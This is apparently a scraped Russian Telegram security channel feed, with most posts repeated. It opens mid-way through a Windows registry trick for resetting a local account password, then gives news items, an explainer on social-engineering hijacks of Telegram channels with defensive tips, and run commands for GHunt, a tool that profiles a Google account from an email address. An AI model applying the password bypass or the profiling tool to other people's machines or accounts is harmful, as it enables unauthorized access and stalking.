Далее нужно выбрать раздел с заданным вами ранее именем, кликнуть на "Файл", затем "Выгрузить куст" и подтвердить выгрузку.
Почти готово, теперь можно закрывать все окна и перезагружаться с жесткого диска. При запуске системы откроется командная строка.
В ней нужно вписать команду
userПросмотрев список пользователей, выбираем нужного и прописываем команду
user <имя выбранного пользователя> <новый пароль>Если имя содержит пробелы, его нужно взять в кавычки.
Далее нужно откатить правки в реестре. Вписываем в консоль regedit и переходим к разделу HKEYLOCALMACHINE\System\Setup. Из параметра CmdLine удаляем значение, а в SetupType прописываем 0.
Готово! Теперь можно закрывать редактор и командную строку, перезагружать устройство и авторизовываться с помощью нового пароля.
Бывший хакер возглавил службу безопасности Twitter
Руководителем службы безопасности Twitter назначен специалист по сетевой безопасности и один из самых известных в мире хакеров Пейтер Затко.
На посту главы службы безопасности Twitter Затко будет заниматься информационной безопасностью, безопасностью сайта, физической безопасностью и безопасностью платформы. Он получит широкие полномочия, включая возможность предлагать изменения в структуре и методах работы соцсети и будет подчиняться непосредственно генеральному директору компании Джеку Дорси.
Затко, во время хакерской деятельности носивший псевдоним Мадж, стал известен благодаря своим достижениям в хакерском объединении L0pht. Кроме того, он является одним из ключевых членов хакерской и медиагруппировки «Культ мертвой коровы», которая была создана в 80-е годы прошлого века. Также он занимался исследованиями в области кибербезопасности для федерального агентства DARPA, находящегося в подчинении Пентагона, и специальными проектами для корпорации Google, а в последнее время работал с платежным сервисом Stripe.
#новость
Руководителем службы безопасности Twitter назначен специалист по сетевой безопасности и один из самых известных в мире хакеров Пейтер Затко.
На посту главы службы безопасности Twitter Затко будет заниматься информационной безопасностью, безопасностью сайта, физической безопасностью и безопасностью платформы. Он получит широкие полномочия, включая возможность предлагать изменения в структуре и методах работы соцсети и будет подчиняться непосредственно генеральному директору компании Джеку Дорси.
Затко, во время хакерской деятельности носивший псевдоним Мадж, стал известен благодаря своим достижениям в хакерском объединении L0pht. Кроме того, он является одним из ключевых членов хакерской и медиагруппировки «Культ мертвой коровы», которая была создана в 80-е годы прошлого века. Также он занимался исследованиями в области кибербезопасности для федерального агентства DARPA, находящегося в подчинении Пентагона, и специальными проектами для корпорации Google, а в последнее время работал с платежным сервисом Stripe.
#новость
Информационная безопасность — это не про таинственный образ хакера из популярных сериалов и кино.
Это про чёткое понимание того, как функционируют системы, как они разрабатываются и как защищать данные в этих системах и сами системы.
Об индустрии кибербезопасности подробно расскажут на бесплатном занятии Нетологии «Как стать специалистом по информационной безопасности с нуля».
В результате вы узнаете:
— О востребованности сферы, кому она подходит и как в неё попасть;
— Как информационная безопасность работает в теории и на практике и какие основные технологии и инструменты в ней используют;
— Какие нужны знания и навыки, чтобы стать специалистом в области кибербезопасности и как их получить.
Спикер:
— Анастасия Баринова, заместитель руководителя лаборатории компьютерной криминалистики по обучению в Group-IB.
Регистрация по ссылке ↓
http://netolo.gy/fXV
Это про чёткое понимание того, как функционируют системы, как они разрабатываются и как защищать данные в этих системах и сами системы.
Об индустрии кибербезопасности подробно расскажут на бесплатном занятии Нетологии «Как стать специалистом по информационной безопасности с нуля».
В результате вы узнаете:
— О востребованности сферы, кому она подходит и как в неё попасть;
— Как информационная безопасность работает в теории и на практике и какие основные технологии и инструменты в ней используют;
— Какие нужны знания и навыки, чтобы стать специалистом в области кибербезопасности и как их получить.
Спикер:
— Анастасия Баринова, заместитель руководителя лаборатории компьютерной криминалистики по обучению в Group-IB.
Регистрация по ссылке ↓
http://netolo.gy/fXV
Как взламывают каналы в Telegram
Во вторник, 10 ноября, крупный телеграм канал Reddit с аудиторией в 235 тысяч человек был взломан. К счастью, не с помощью уязвимостей самого сервиса, а с использованием социальной инженерии. Злоумышленники написали главному администратору канала от лица представителей Filmora и вынудили установить вирус удаленного доступа под видом видеоредактора.
Как итог администрация канала потеряла к нему доступ на некоторое время. Хакеры удалили действующих админов, наделив себя всеми правами создателей. К слову, в этот же день аналогичным образом был атакован канал Baza, но получить к нему доступ не удалось.
Эта новость лишь одна из, поскольку в последнее время тема с "захватом" телеграм каналов становится особо актуальной. Злоумышленники используют сразу несколько способов взлома. Все они базируются на социальной инженерии и невнимательности пользователей. Разберем для примера несколько из них.
Фейковый гарант
Этот способ уже получил достаточную огласку, однако на него продолжают вестись неопытные пользователи. Суть заключается в создании копии аккаунта зарекомендовавшего себя гаранта, чтобы простым просмотром профиля было сложно отличить оригинал от подделки.
Делается это с помощью замены схожих символов или незаметных корректив в никнейме, копирования аватарки и поля "О себе". Также есть вариант со скрытием юзернейма, и подстановку оригинального ника в поле "О себе".
Процесс работы схемы очевиден. Покупатель создает чат с фейковым гарантом и продавцом. Продавец из-за схожести профилей не может отличить лже-гаранта. Начинается процесс сделки, владелец передает права злоумышленнику и не получает обещанных денег.
Через видео-конференцию
Данный способ более изощренный, но не менее действенный. Выманив у владельца номер телефона, злоумышленник просит продемонстрировать наличие прав администратора у продавца через конференцию в Skype или Zoom.
В момент, когда действующий администратор демонстрирует свой аккаунт Telegram, злоумышленник пытается залогиниться с помощью номера телефона. Тем самым код подтверждения приходит сообщением владельцу канала, хакер его видит с помощью трансляции, вписывает и получает доступ. После чего банальный процесс передачи прав на другой аккаунт, и канал захвачен.
Как защитить канал
В итоге, выводом из представленных выше способов взлома телеграм-каналов могут быть следующие советы. При продаже канала лучше лично найти проверенного гаранта, либо максимально тщательно проверять профили предоставляемых. Закрывать конфиденциальную информацию при видеоконференции или пользоваться скриншотами. Не скачивать посторонних программ, и просто придерживаться базовых правил информационной безопасности.
#взлом #мошенничество
Во вторник, 10 ноября, крупный телеграм канал Reddit с аудиторией в 235 тысяч человек был взломан. К счастью, не с помощью уязвимостей самого сервиса, а с использованием социальной инженерии. Злоумышленники написали главному администратору канала от лица представителей Filmora и вынудили установить вирус удаленного доступа под видом видеоредактора.
Как итог администрация канала потеряла к нему доступ на некоторое время. Хакеры удалили действующих админов, наделив себя всеми правами создателей. К слову, в этот же день аналогичным образом был атакован канал Baza, но получить к нему доступ не удалось.
Эта новость лишь одна из, поскольку в последнее время тема с "захватом" телеграм каналов становится особо актуальной. Злоумышленники используют сразу несколько способов взлома. Все они базируются на социальной инженерии и невнимательности пользователей. Разберем для примера несколько из них.
Фейковый гарант
Этот способ уже получил достаточную огласку, однако на него продолжают вестись неопытные пользователи. Суть заключается в создании копии аккаунта зарекомендовавшего себя гаранта, чтобы простым просмотром профиля было сложно отличить оригинал от подделки.
Делается это с помощью замены схожих символов или незаметных корректив в никнейме, копирования аватарки и поля "О себе". Также есть вариант со скрытием юзернейма, и подстановку оригинального ника в поле "О себе".
Процесс работы схемы очевиден. Покупатель создает чат с фейковым гарантом и продавцом. Продавец из-за схожести профилей не может отличить лже-гаранта. Начинается процесс сделки, владелец передает права злоумышленнику и не получает обещанных денег.
Через видео-конференцию
Данный способ более изощренный, но не менее действенный. Выманив у владельца номер телефона, злоумышленник просит продемонстрировать наличие прав администратора у продавца через конференцию в Skype или Zoom.
В момент, когда действующий администратор демонстрирует свой аккаунт Telegram, злоумышленник пытается залогиниться с помощью номера телефона. Тем самым код подтверждения приходит сообщением владельцу канала, хакер его видит с помощью трансляции, вписывает и получает доступ. После чего банальный процесс передачи прав на другой аккаунт, и канал захвачен.
Как защитить канал
В итоге, выводом из представленных выше способов взлома телеграм-каналов могут быть следующие советы. При продаже канала лучше лично найти проверенного гаранта, либо максимально тщательно проверять профили предоставляемых. Закрывать конфиденциальную информацию при видеоконференции или пользоваться скриншотами. Не скачивать посторонних программ, и просто придерживаться базовых правил информационной безопасности.
#взлом #мошенничество
Названы самые популярные пароли в 2020 году
Аналитики компании по управлению паролями NordPass представили рейтинг из 200 самых популярных паролей в сети в 2020 году.
Проверив почти 275,7 миллиона паролей, NordPass опубликовал список наиболее часто используемых паролей для онлайн-аккаунтов в 2020 году. Первые пять строчек заняли такие сочетания, как "123456789", "picture1", "password" и "12345678". Самым популярным паролем оказался "123456", который только за 2020 год был взломан более 23 миллионов раз.
Более короткий пароль «12345» занимал первое место в прошлом году. Но более 188000 пользователей выбрали его в этом году, что позволило занять ему восьмое место. Оба пароля можно взломать менее чем за секунду.
Аналитики заметили, что пользователи предпочитают простые пароли, ведь их проще запомнить. Ради удобства многие используют для защиты аккаунтов нецензурные слова, числа, имена и еду.
#новость
Аналитики компании по управлению паролями NordPass представили рейтинг из 200 самых популярных паролей в сети в 2020 году.
Проверив почти 275,7 миллиона паролей, NordPass опубликовал список наиболее часто используемых паролей для онлайн-аккаунтов в 2020 году. Первые пять строчек заняли такие сочетания, как "123456789", "picture1", "password" и "12345678". Самым популярным паролем оказался "123456", который только за 2020 год был взломан более 23 миллионов раз.
Более короткий пароль «12345» занимал первое место в прошлом году. Но более 188000 пользователей выбрали его в этом году, что позволило занять ему восьмое место. Оба пароля можно взломать менее чем за секунду.
Аналитики заметили, что пользователи предпочитают простые пароли, ведь их проще запомнить. Ради удобства многие используют для защиты аккаунтов нецензурные слова, числа, имена и еду.
#новость
Google тестирует сквозное шифрование для сообщений в Android
Google планирует реализовать сквозное шифрование для стандарта Rich Communication Service (RCS), предназначенного для получения и отправки текстовых сообщений. Именно этот стандарт интернет-гигант продвигает как альтернативу СМС-сообщениям.
Само собой, RCS серьёзно превосходит SMS во многих аспектах. Например, стандарт Google предлагает более длинные сообщения, поддерживающие расшаривание геолокации и более функциональную оправку медиафайлов.
На этой неделе Google сообщил об успешном внедрении RCS по всему миру, а теперь пришло время для следующего шага — сквозного шифрования (E2EE).
Пользователям должен понравиться дополнительный упор на конфиденциальность, ведь интерес к сквозному шифрованию возник ещё после слов Эдварда Сноудена, обвинившего АНБ США в шпионаже за гражданами.
Принято считать, что E2EE защищает переписки пользователей от вторжения третьей стороны. Сквозное шифрование успешно реализовали такие узнаваемые мессенджеры, как Signal, WhatsApp и iMessage.
Технические детали, описывающие нововведение, Google опубликовал здесь (PDF). Из этого документа можно понять, что защищённые E2EE сообщения будут генерироваться с помощью протокола Signal.
#новость
Google планирует реализовать сквозное шифрование для стандарта Rich Communication Service (RCS), предназначенного для получения и отправки текстовых сообщений. Именно этот стандарт интернет-гигант продвигает как альтернативу СМС-сообщениям.
Само собой, RCS серьёзно превосходит SMS во многих аспектах. Например, стандарт Google предлагает более длинные сообщения, поддерживающие расшаривание геолокации и более функциональную оправку медиафайлов.
На этой неделе Google сообщил об успешном внедрении RCS по всему миру, а теперь пришло время для следующего шага — сквозного шифрования (E2EE).
Пользователям должен понравиться дополнительный упор на конфиденциальность, ведь интерес к сквозному шифрованию возник ещё после слов Эдварда Сноудена, обвинившего АНБ США в шпионаже за гражданами.
Принято считать, что E2EE защищает переписки пользователей от вторжения третьей стороны. Сквозное шифрование успешно реализовали такие узнаваемые мессенджеры, как Signal, WhatsApp и iMessage.
Технические детали, описывающие нововведение, Google опубликовал здесь (PDF). Из этого документа можно понять, что защищённые E2EE сообщения будут генерироваться с помощью протокола Signal.
#новость
Сбор информации об учетной записи Google
Снова, независимые разработчики создали еще один полезный OSINT инструмент, который позволяет извлечь большое количество информации из электронной почты чьей-либо учетной записи Google.
На данный момент, инструмент поможет собирать такую информацию, как: Имя владельца аккаунта, время последнего редактирования профиля, Google ID, активированные сервисы Google, Возможный канал на YouTube, возможные другие имена пользователя, публичные фото, распознает модель и прошивку смартфона, установленные программы, cобытия из Календаря Google и самое интересное, возможное физическое местонахождение.
Для работы требуется Python 3.7+.
Установка
📌https://github.com/mxrch/GHunt
#OSINT
Снова, независимые разработчики создали еще один полезный OSINT инструмент, который позволяет извлечь большое количество информации из электронной почты чьей-либо учетной записи Google.
На данный момент, инструмент поможет собирать такую информацию, как: Имя владельца аккаунта, время последнего редактирования профиля, Google ID, активированные сервисы Google, Возможный канал на YouTube, возможные другие имена пользователя, публичные фото, распознает модель и прошивку смартфона, установленные программы, cобытия из Календаря Google и самое интересное, возможное физическое местонахождение.
Для работы требуется Python 3.7+.
Установка
python -m pip install -r requirements.txt
Настройкаcheck_and_gen.py
python hunt.py почтаюзера@gmail.com
Этот проект использует Selenium и автоматически загружает правильный драйвер для вашей версии Chrome. Так что просто убедитесь, что у вас установлен Google Chrome.📌https://github.com/mxrch/GHunt
#OSINT